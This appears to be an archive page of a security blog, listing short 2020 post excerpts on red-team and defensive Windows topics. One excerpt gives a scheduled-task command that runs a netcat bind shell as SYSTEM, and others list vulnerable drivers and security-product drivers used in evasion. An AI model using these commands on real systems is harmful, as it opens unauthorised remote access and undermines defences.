by frank | Oct 26, 2020 | AV, Security, Windows
Reading Time: 3 minutesThe other day, I was shadowing a colleague of me who was doing a red team. The client was running McAfee AV. While the reputation of that AV isn’t the best, it got a bit in the way for a few minutes. After doing a lateral movement, my...
by frank | Oct 13, 2020 | Palo Alto, Security
Reading Time: < 1 minuteseverity-> Unknown (0), Informational (0.5), Low (1), Medium (2), High (3), Critical (4) To create a new docker with some lib dependancies (or update current one) /docker_image_create name=testdocker base=demisto/python3...
by frank | Oct 13, 2020 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteto check if a Win domain is a possible candidate to a MITM WSUS attack check reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer...
by frank | Sep 11, 2020 | Blue Team, Windows
Reading Time: < 1 minuteEvil-SSDP can be found at https://github.com/initstring/evil-ssdp Disable your firewall to block SSDP netsh advfirewall firewall set rule group=”Network Discovery” new...
by frank | Aug 24, 2020 | AV, Pwn, Red team, Security, Windows
Reading Time: < 1 minuteIntel Network Adapter Diagnostic Driver of version 1.03.0.7;RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below;Gdrv driver from various Gigabyte TOOLS of undefined version;ATSZIO64 driver from ASUSTeK WinFlash...
by frank | Aug 19, 2020 | AV, Red team, Security
Reading Time: < 1 minuteWdFilter.sys : antimalware, malware WdNisDrv.sys : defender cyvrfsfd.sys : Palo Alto Networks cyvrlpc.sys : Palo Alto Networks tedrdrv.sys : Palo Alto Networks cyvrmtgn.sys : Palo Alto Networks cyverak.sys : cyvera, Palo Alto Networks...
by frank | Aug 17, 2020 | Security, Windows
Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...
by frank | Jul 9, 2020 | Blue Team, Malware, Security
Reading Time: 5 minutesThis is the 3rd article in this serie. (here is part1 & part2) A little adon to Part 1 & 2, as part of my job is to implement Palo Alto Networks Firewalls, I took the task to work with PaloAltoNetworks for them to create a signature to...
by frank | Jul 3, 2020 | Pwn, Red team, Security
Reading Time: < 1 minutehttps://hashcat.net/hashcat/ and https://github.com/hashcat It’s a tool that let’s you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute...
by frank | Jul 1, 2020 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...
Recent Comments